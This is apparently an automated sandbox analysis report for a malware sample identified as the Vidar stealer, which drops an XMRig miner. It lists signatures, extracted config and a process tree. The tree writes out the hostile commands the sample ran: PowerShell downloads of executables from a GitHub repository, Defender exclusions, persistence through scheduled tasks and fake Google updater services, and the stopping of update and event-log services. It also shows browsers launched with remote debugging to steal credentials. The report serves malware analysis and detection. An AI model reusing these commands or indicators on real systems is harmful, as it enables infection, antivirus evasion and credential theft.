Analysis
max time kernel: 148s
max time network: 149s
platform: windows11-21h2_x64
resource: win11-20250313-en
resource tags: arch:x64, arch:x86, image:win11-20250313-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 28/03/2025, 14:24
Static task: static1
Behavioral task: behavioral1 (sample PokyBilsTGS.exe, resource win10ltsc2021-20250314-en)
Behavioral task: behavioral2 (sample PokyBilsTGS.exe, resource win11-20250313-en)
General
Target: PokyBilsTGS.exe
Size: 322KB
MD5: 1b044fbca4a8963fb4ab17ab5ae7c2ef
SHA1: c234cc9b4dcb92fdd21ec71bae98745eaf43b7bd
SHA256: 7c4aa4a2ab6b2a032881e90f13ddd38b675b0d3db391bfd1a60d55927a483587
SHA512: cf31978386764bb0fd8c12c32e3c354ead48dacbcffe035e07f2a40ba09a418033e47ecb1e79dfbe6dafe03676cb834f2281a8456b82e8e4a13b9ddfac9d6d00
SSDEEP: 6144:GmQCJp3wv+eLkfCOuHejhurki9H/WUgCNxwsD7Gm:vHa+ekfxjhurv9eMksD6m
Malware Config
Extracted: vidar
Version: 13.3
886e3178ef0cef21a6ff7125395660f2
https://t.me/lw25chm
https://steamcommunity.com/profiles/76561199839170361
user_agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Signatures
Detect Vidar Stealer (1 IoCs)
  yara_rule family_vidar_v7 matched resource behavioral2/files/0x001b00000002b1ae-50.dat
Vidar family
Xmrig family
XMRig Miner payload (9 IoCs)
  yara_rule xmrig matched memory dumps of PID 5216, region 0x0000000140000000-0x0000000140835000 (resources behavioral2/memory/5216-633, 663, 666, 665, 664, 662, 634, 826, 827 -0x0000000140000000-0x0000000140835000-memory.dmp)
Blocklisted process makes network request (6 IoCs)
  flow 2: PID 3324 powershell.exe; flow 3: PID 5116 powershell.exe; flow 4: PID 3360 powershell.exe; flow 5: PID 5116 powershell.exe; flow 6: PID 3324 powershell.exe; flow 7: PID 3360 powershell.exe
Process list whose signature heading was not preserved in the extract: PID 3324 powershell.exe, 3360 powershell.exe, 5116 powershell.exe, 5636 powershell.exe, 5924 powershell.exe, 3532 powershell.exe
Creates new service(s) (2 TTPs)
Drops file in Drivers directory (2 IoCs)
  File created C:\Windows\system32\drivers\etc\hosts by llttzcccf.exe
  File created C:\Windows\system32\drivers\etc\hosts by Updater.exe
Stops running service(s) (4 TTPs)
Uses browser remote debugging (2 TTPs, 8 IoCs)
Can be used to control the browser and steal sensitive information such as credentials and session cookies.
  PIDs: 5968 chrome.exe, 2880 chrome.exe, 1540 chrome.exe, 3748 chrome.exe, 2344 msedge.exe, 1104 msedge.exe, 4620 msedge.exe, 5808 chrome.exe
Executes dropped EXE (5 IoCs)
  PIDs: 4492 pydvp.exe, 4340 gganxacc.exe, 2864 llttzcccf.exe, 1604 service.exe, 4936 Updater.exe
Reads data files stored by FTP clients (2 TTPs)
Tries to access configuration files associated with programs like FileZilla.
Reads user/profile data of web browsers (3 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Unsecured Credentials: Credentials In Files (1 TTPs)
Steal credentials from unsecured files.
Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.
Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 5 IoCs)
  flow 5: raw.githubusercontent.com; flow 6: raw.githubusercontent.com; flow 7: raw.githubusercontent.com; flow 17: pastebin.com; flow 1: raw.githubusercontent.com
Power Settings (1 TTPs, 8 IoCs)
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
  PIDs: 3892, 4412, 4260, 5148, 2020, 2772, 4976, 6068 (all powercfg.exe)
Drops file in System32 directory (4 IoCs)
  File opened for modification C:\Windows\system32\MRT.exe by llttzcccf.exe
  File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive by powershell.exe
  File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log by powershell.exe
  File opened for modification C:\Windows\system32\MRT.exe by Updater.exe
Suspicious use of SetThreadContext (2 IoCs)
  PID 4936 Updater.exe set thread context of PID 5288 (procid_target 180)
  PID 4936 Updater.exe set thread context of PID 5216 (procid_target 182)
yara_rule upx matched (14 IoCs): memory dumps of PID 5216, region 0x0000000140000000-0x0000000140835000 (resources behavioral2/memory/5216-613, 633, 663, 666, 665, 664, 662, 634, 632, 620, 631, 630, 826, 827 -0x0000000140000000-0x0000000140835000-memory.dmp)
Drops file in Windows directory (2 IoCs)
  File opened for modification C:\Windows\SystemTemp by chrome.exe
  File opened for modification C:\Windows\SystemTemp by msedge.exe
Launches sc.exe (14 IoCs)
Sc.exe is a Windows utility to control services on the system.
  PIDs: 1612, 3764, 4412, 2264, 1012, 4240, 5848, 3236, 5056, 5540, 5916, 2348, 4660, 1044 (all sc.exe)
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTPs, 9 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language by pydvp.exe, gganxacc.exe, cmd.exe (3 entries), schtasks.exe (2 entries), timeout.exe, service.exe
Checks processor information in registry (2 TTPs, 2 IoCs)
Processor information is often read in order to detect sandboxing environments.
  Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString by gganxacc.exe
  Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 by gganxacc.exe
Delays execution with timeout.exe (1 IoCs)
  PID: 1436 timeout.exe
Enumerates system info in registry (2 TTPs, 6 IoCs)
  Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS by msedge.exe and by chrome.exe
  Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName by msedge.exe and by chrome.exe
  Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer by msedge.exe and by chrome.exe
Modifies data under HKEY_USERS (48 IoCs)
  powershell.exe created keys under \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ (CA, Disallowed, Root, SmartCardRoot, trust, TrustedPeople and their Certificates, CRLs and CTLs subkeys) and under \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\ (CA, Disallowed, trust, TrustedPeople and their Certificates, CRLs and CTLs subkeys)
  powershell.exe created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ and \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
  powershell.exe set values (int) under \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap: UNCAsIntranet = "1", ProxyBypass = "1", IntranetName = "1", AutoDetect = "0"
  chrome.exe created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry and set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133876455636098479"
Scheduled Task/Job: Scheduled Task (1 TTPs, 2 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
  PIDs: 2160 schtasks.exe, 1020 schtasks.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
  Processes (repeated entries collapsed): powershell.exe 5636, 3324, 5116, 3360, 5924, 3532; gganxacc.exe 4340; chrome.exe 5808; llttzcccf.exe 2864; Updater.exe 4936; explorer.exe 5216
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (6 IoCs)
  Processes: chrome.exe 5808 (4 entries), msedge.exe 2344 (2 entries)
Suspicious use of AdjustPrivilegeToken (37 IoCs)
  SeDebugPrivilege: powershell.exe 5636, 3324, 5116, 3360, 5924, 3532
  SeShutdownPrivilege and SeCreatePagefilePrivilege (repeated entries collapsed): chrome.exe 5808; powercfg.exe 2772, 2020, 5148, 4260, 6068, 4976, 3892, 4412
  SeLockMemoryPrivilege: explorer.exe 5216
Suspicious use of FindShellTrayWindow (27 IoCs)
  Processes (repeated entries collapsed): chrome.exe 5808, msedge.exe 2344
Suspicious use of WriteProcessMemory (64 IoCs, repeated entries collapsed)
  PID 1116 PokyBilsTGS.exe wrote to memory of 3860, 4920, 4928, 4708, 4492, 4340, 2864
  PID 3860 cmd.exe wrote to memory of 5636
  PID 4708 cmd.exe wrote to memory of 5116
  PID 4928 cmd.exe wrote to memory of 3360
  PID 4920 cmd.exe wrote to memory of 3324
  PID 4492 pydvp.exe wrote to memory of 4300
  PID 4300 cmd.exe wrote to memory of 2160
  PID 4340 gganxacc.exe wrote to memory of 5808
  PID 5808 chrome.exe wrote to memory of 236 and 1352
Processes (tree depth shown in brackets)

[1] C:\Users\Admin\AppData\Local\Temp\PokyBilsTGS.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\PokyBilsTGS.exe"
    PID: 1116
    Signatures: Suspicious use of WriteProcessMemory

  [2] C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\wzioof', 'C:\Users', 'C:\ProgramData'"
      PID: 3860
      Signatures: Suspicious use of WriteProcessMemory

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\wzioof', 'C:\Users', 'C:\ProgramData'"
        PID: 5636
        Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/diperkla/deljack/raw/refs/heads/main/nbotpasppp.exe' -OutFile 'C:\Users\Admin\AppData\Local\wzioof\gganxacc.exe'"
      PID: 4920
      Signatures: Suspicious use of WriteProcessMemory

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell -Command "Invoke-WebRequest -Uri 'https://github.com/diperkla/deljack/raw/refs/heads/main/nbotpasppp.exe' -OutFile 'C:\Users\Admin\AppData\Local\wzioof\gganxacc.exe'"
        PID: 3324
        Signatures: Blocklisted process makes network request; Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/diperkla/deljack/raw/refs/heads/main/tkskfaaa.exe' -OutFile 'C:\Users\Admin\AppData\Local\wzioof\pydvp.exe'"
      PID: 4708
      Signatures: Suspicious use of WriteProcessMemory

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell -Command "Invoke-WebRequest -Uri 'https://github.com/diperkla/deljack/raw/refs/heads/main/tkskfaaa.exe' -OutFile 'C:\Users\Admin\AppData\Local\wzioof\pydvp.exe'"
        PID: 5116
        Signatures: Blocklisted process makes network request; Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/diperkla/deljack/raw/refs/heads/main/gfdthawdddd.exe' -OutFile 'C:\Users\Admin\AppData\Local\wzioof\llttzcccf.exe'"
      PID: 4928
      Signatures: Suspicious use of WriteProcessMemory

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell -Command "Invoke-WebRequest -Uri 'https://github.com/diperkla/deljack/raw/refs/heads/main/gfdthawdddd.exe' -OutFile 'C:\Users\Admin\AppData\Local\wzioof\llttzcccf.exe'"
        PID: 3360
        Signatures: Blocklisted process makes network request; Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  [2] C:\Users\Admin\AppData\Local\wzioof\pydvp.exe
      Command line: "C:\Users\Admin\AppData\Local\wzioof\pydvp.exe"
      PID: 4492
      Signatures: Executes dropped EXE; System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory

    [3] C:\Windows\SysWOW64\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /C schtasks /create /tn GoogleUpdaterex /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
        PID: 4300
        Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory

      [4] C:\Windows\SysWOW64\schtasks.exe
          Command line: schtasks /create /tn GoogleUpdaterex /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
          PID: 2160
          Signatures: System Location Discovery: System Language Discovery; Scheduled Task/Job: Scheduled Task
  [2] C:\Users\Admin\AppData\Local\wzioof\gganxacc.exe
      Command line: "C:\Users\Admin\AppData\Local\wzioof\gganxacc.exe"
      PID: 4340
      Signatures: Executes dropped EXE; System Location Discovery: System Language Discovery; Checks processor information in registry; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
    [3] C:\Program Files\Google\Chrome\Application\chrome.exe
        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        PID: 5808
        Signatures: Uses browser remote debugging; Drops file in Windows directory; Enumerates system info in registry; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary; Suspicious use of AdjustPrivilegeToken; Suspicious use of FindShellTrayWindow; Suspicious use of WriteProcessMemory
      [4] C:\Program Files\Google\Chrome\Application\chrome.exe
          Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbbd22dcf8,0x7ffbbd22dd04,0x7ffbbd22dd10
          PID: 236

      [4] C:\Program Files\Google\Chrome\Application\chrome.exe
          Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1876,i,12668610166030175126,6346541066418117400,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=1708 /prefetch:2
          PID: 1352

      [4] C:\Program Files\Google\Chrome\Application\chrome.exe
          Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1432,i,12668610166030175126,6346541066418117400,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2228 /prefetch:11
          PID: 5760

      [4] C:\Program Files\Google\Chrome\Application\chrome.exe
          Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2376,i,12668610166030175126,6346541066418117400,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2756 /prefetch:13
          PID: 5908

      [4] C:\Program Files\Google\Chrome\Application\chrome.exe
          Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3128,i,12668610166030175126,6346541066418117400,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3184 /prefetch:1
          PID: 2880
          Signatures: Uses browser remote debugging

      [4] C:\Program Files\Google\Chrome\Application\chrome.exe
          Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3136,i,12668610166030175126,6346541066418117400,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3240 /prefetch:1
          PID: 5968
          Signatures: Uses browser remote debugging

      [4] C:\Program Files\Google\Chrome\Application\chrome.exe
          Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4252,i,12668610166030175126,6346541066418117400,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3788 /prefetch:9
          PID: 1540
          Signatures: Uses browser remote debugging

      [4] C:\Program Files\Google\Chrome\Application\chrome.exe
          Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4648,i,12668610166030175126,6346541066418117400,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4688 /prefetch:1
          PID: 3748
          Signatures: Uses browser remote debugging

      [4] C:\Program Files\Google\Chrome\Application\chrome.exe
          Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5352,i,12668610166030175126,6346541066418117400,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5364 /prefetch:14
          PID: 1164

      [4] C:\Program Files\Google\Chrome\Application\chrome.exe
          Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5424,i,12668610166030175126,6346541066418117400,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5444 /prefetch:14
          PID: 4756

      [4] C:\Program Files\Google\Chrome\Application\chrome.exe
          Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5232,i,12668610166030175126,6346541066418117400,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5532 /prefetch:14
          PID: 3736

      [4] C:\Program Files\Google\Chrome\Application\chrome.exe
          Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5784,i,12668610166030175126,6346541066418117400,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5364 /prefetch:14
          PID: 2884

      [4] C:\Program Files\Google\Chrome\Application\chrome.exe
          Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5776,i,12668610166030175126,6346541066418117400,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5772 /prefetch:14
          PID: 4668

      [4] C:\Program Files\Google\Chrome\Application\chrome.exe
          Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5360,i,12668610166030175126,6346541066418117400,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5792 /prefetch:14
          PID: 4844
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
      - Uses browser remote debugging
      - Drops file in Windows directory
      - Enumerates system info in registry
      - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      - Suspicious use of FindShellTrayWindow
      PID: 2344

      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x2f4,0x7ffba50af208,0x7ffba50af214,0x7ffba50af220
        PID: 4192

      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1804,i,3488708138661397920,7489684747265108533,262144 --variations-seed-version --mojo-platform-channel-handle=2184 /prefetch:11
        PID: 4212

      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2156,i,3488708138661397920,7489684747265108533,262144 --variations-seed-version --mojo-platform-channel-handle=2148 /prefetch:2
        PID: 5896

      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2280,i,3488708138661397920,7489684747265108533,262144 --variations-seed-version --mojo-platform-channel-handle=2832 /prefetch:13
        PID: 4128

      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3444,i,3488708138661397920,7489684747265108533,262144 --variations-seed-version --mojo-platform-channel-handle=3488 /prefetch:1
        - Uses browser remote debugging
        PID: 4620

      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3456,i,3488708138661397920,7489684747265108533,262144 --variations-seed-version --mojo-platform-channel-handle=3492 /prefetch:1
        - Uses browser remote debugging
        PID: 1104

    C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\yusje" & exit
      - System Location Discovery: System Language Discovery
      PID: 1988

      C:\Windows\SysWOW64\timeout.exe
        timeout /t 11
        - System Location Discovery: System Language Discovery
        - Delays execution with timeout.exe
        PID: 1436

  C:\Users\Admin\AppData\Local\wzioof\llttzcccf.exe
    "C:\Users\Admin\AppData\Local\wzioof\llttzcccf.exe"
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    PID: 2864

    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 5924

    C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      PID: 3280

      C:\Windows\system32\wusa.exe
        wusa /uninstall /kb:890830 /quiet /norestart
        PID: 5996

    C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      - Launches sc.exe
      PID: 3764

    C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      - Launches sc.exe
      PID: 4412

    C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      - Launches sc.exe
      PID: 2264

    C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      - Launches sc.exe
      PID: 5540

    C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      - Launches sc.exe
      PID: 1012

    C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      - Power Settings
      - Suspicious use of AdjustPrivilegeToken
      PID: 2772

    C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      - Power Settings
      - Suspicious use of AdjustPrivilegeToken
      PID: 2020

    C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      - Power Settings
      - Suspicious use of AdjustPrivilegeToken
      PID: 5148

    C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      - Power Settings
      - Suspicious use of AdjustPrivilegeToken
      PID: 4260

    C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineK"
      - Launches sc.exe
      PID: 5916

    C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineK" binpath= "C:\ProgramData\GoogleUP\Chrome\Updater.exe" start= "auto"
      - Launches sc.exe
      PID: 2348

    C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      - Launches sc.exe
      PID: 4240

    C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineK"
      - Launches sc.exe
      PID: 4660

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
  "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
  PID: 4980

C:\Users\Admin\AppData\Roaming\service.exe
  C:\Users\Admin\AppData\Roaming\service.exe
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID: 1604

  C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C schtasks /create /tn GoogleUpdaterex /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
    - System Location Discovery: System Language Discovery
    PID: 1284

    C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn GoogleUpdaterex /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
      - System Location Discovery: System Language Discovery
      - Scheduled Task/Job: Scheduled Task
      PID: 1020

C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
  PID: 4628

C:\ProgramData\GoogleUP\Chrome\Updater.exe
  C:\ProgramData\GoogleUP\Chrome\Updater.exe
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  PID: 4936

  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 3532

  C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    PID: 4792

    C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      PID: 1048

